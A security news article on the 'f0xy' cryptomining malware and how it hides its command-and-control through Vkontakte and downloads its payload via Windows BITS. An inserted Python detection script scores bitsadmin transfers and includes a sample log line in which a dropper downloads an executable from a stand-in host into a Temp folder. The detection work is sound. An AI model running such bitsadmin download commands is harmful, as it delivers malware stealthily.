New “F0xy” Malware Uses Clever Techniques to Stay Hidden

New Malware Downloads Cryptocurrency Miner to Infected Devices

Researchers at Websense have come across a new piece of malware that leverages legitimate websites and services in an effort to disguise its malicious activities.

The threat has been dubbed “f0xy” not only because it’s cunning like a fox, but also because this particular string has been found in its executables and in the registry keys it creates for persistence.

The earliest samples identified by researchers are dated January 13, 2015, but the malware has been enhanced by its creators since. Initial variants only worked on Windows Vista and later versions of Microsoft’s operating system, but newer variants also work on Windows XP, Websense said.

The initial dropper was detected by only 5 of the antivirus engines on VirusTotal when it was analyzed by Websense. The detection rate has increased since, but it’s still fairly low.

According to researchers, the developers of f0xy chose not to obfuscate the malware’s code, most likely in an effort to make it look more legitimate and avoid raising suspicion.

Another method used to hide the presence of the threat involves the Russian social media website Vkontakte. The malware contains an encoded string that hides a URL pointing to a certain Vkontakte profile. An encoded string posted on the said profile as a comment contains the URL for the command and control (C&C) server used by the malware.

Once the f0xy downloader finds itself on a computer, it leverages the Microsoft Background Intelligent Transfer Service (BITS) to download its payload. BITS is designed for transferring files between a client and a server using idle network bandwidth. The component is leveraged by services like Windows Defender and Windows Update.

“Presumably the main reason for using BITS is to prevent security products from flagging its behavior as suspicious, because anti-malware solutions are much less likely to have a problem with bitsadmin.exe performing network requests than an unknown executable,” Websense researcher Nick Griffin wrote in a blog post.

In this case, the malware calls the bitsadmin executable directly to specify the parameters for the file transfer (source and destination of the file). However, experts have pointed out that the transfer can be made even stealthier by interacting with BITS through the Component Object Model (COM) interface.
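Because the downloader invokes bitsadmin.exe directly with a source URL and a local destination, the process-creation telemetry a defender already collects is a natural place to spot it. The following script is an added illustration, not code from Websense or from the f0xy analysis: it parses constructed log lines resembling Sysmon event ID 1 rendered as key="value" pairs (the field names, paths, hostnames and parent-process names are assumptions made for the example, not indicators from the report) and scores each bitsadmin transfer on whether it pulls from a remote URL, writes into a user-writable directory, and was launched by a parent living outside system directories. A COM-based transfer would not produce a bitsadmin.exe process at all, which is exactly the gap the article's last sentence points to; job-level BITS event logs would be needed for that case.

```python
"""Score bitsadmin.exe transfers found in process-creation logs.

Added example for illustration; not Websense's code and not part of the
f0xy report. Log format, paths and hostnames below are constructed.
"""
import re
from typing import Dict, List, Optional

# Constructed sample lines (not real telemetry) in a Sysmon-like key="value" layout.
SAMPLE_LOGS = [
    r'EventID="1" Image="C:\Windows\System32\bitsadmin.exe" ParentImage="C:\Windows\System32\svchost.exe" CommandLine="bitsadmin.exe /list /allusers"',
    r'EventID="1" Image="C:\Windows\System32\bitsadmin.exe" ParentImage="C:\Users\alice\AppData\Local\Temp\dropper.exe" CommandLine="bitsadmin.exe /transfer job1 /download /priority high http://example.invalid/m.bin C:\Users\alice\AppData\Local\Temp\m.exe"',
    r'EventID="1" Image="C:\Windows\System32\bitsadmin.exe" ParentImage="C:\Windows\System32\cmd.exe" CommandLine="bitsadmin.exe /transfer corpjob /download http://intranet.example.invalid/update.msi C:\Updates\update.msi"',
    r'EventID="1" Image="C:\Windows\System32\notepad.exe" ParentImage="C:\Windows\explorer.exe" CommandLine="notepad.exe"',
]

FIELD_RE = re.compile(r'(\w+)="([^"]*)"')

# bitsadmin switches that create or drive a download; /list, /info etc. are read-only.
TRANSFER_VERBS = {"/transfer", "/create", "/addfile", "/resume"}

# Path fragments (lower-cased) treated as user-writable for this example.
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\programdata\\", "\\public\\")


def parse_line(line: str) -> Dict[str, str]:
    """Turn one key="value" log line into a dict."""
    return {key: value for key, value in FIELD_RE.findall(line)}


def assess_bitsadmin(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return a finding for a bitsadmin transfer, or None if the event is not one."""
    image = event.get("Image", "").lower()
    if not image.endswith("\\bitsadmin.exe"):
        return None

    # Simple whitespace split is enough for the constructed samples; real
    # command lines with quoted paths need a quoting-aware tokenizer.
    args = event.get("CommandLine", "").split()
    verbs = {arg.lower() for arg in args if arg.startswith("/")}
    if not verbs & TRANSFER_VERBS:
        return None  # listing or inspecting jobs is not a download

    indicators: List[str] = []
    if any(arg.lower().startswith(("http://", "https://")) for arg in args):
        indicators.append("remote_source")

    # For /transfer the final argument is the local destination path.
    destination = args[-1].lower() if args else ""
    if any(marker in destination for marker in USER_WRITABLE):
        indicators.append("user_writable_destination")

    # Legitimate callers are usually admin shells or system services; a
    # parent executing from a profile or temp directory is the article's
    # "unknown executable" case.
    parent = event.get("ParentImage", "").lower()
    if any(marker in parent for marker in USER_WRITABLE):
        indicators.append("unusual_parent")

    severity = "high" if len(indicators) >= 2 else "low"
    return {
        "parent": event.get("ParentImage", ""),
        "command": event.get("CommandLine", ""),
        "indicators": indicators,
        "severity": severity,
    }


def analyze_logs(lines: List[str]) -> List[Dict[str, object]]:
    """Run the assessment over every line and keep only the findings."""
    findings = []
    for line in lines:
        finding = assess_bitsadmin(parse_line(line))
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for finding in analyze_logs(SAMPLE_LOGS):
        print(f"[{finding['severity']}] {finding['indicators']} <- {finding['parent']}")
        print(f"    {finding['command']}")
```

Run against the samples, the dropper-launched transfer scores high on all three indicators while the cmd.exe-launched intranet download registers only as a remote-source transfer, which is the kind of baseline visibility worth keeping rather than alerting on. Tuning the user-writable markers and the parent allowlist to the environment is what turns this from a demonstration into a usable rule.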

The payload spotted by Websense is a 64-bit version of CPUMiner, a popular open source cryptocurrency mining application. The attackers use a mining pool to ensure that all the virtual currency mined by the infected machines goes to them.

“It is clear that financial motivations remain at the forefront of cybercriminal minds, with the anonymity of cryptocurrency providing a somewhat safer route for collecting the spoils,” Griffin said. “We also expect to see a continuing growth of malware authors migrating to legitimate and reputable websites, to hide their malicious activities, and we expect plenty more evasion tactics adopted as authors continue to subvert security products.”

Eduard Kovacs (@EduardKovacs) is a contributing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.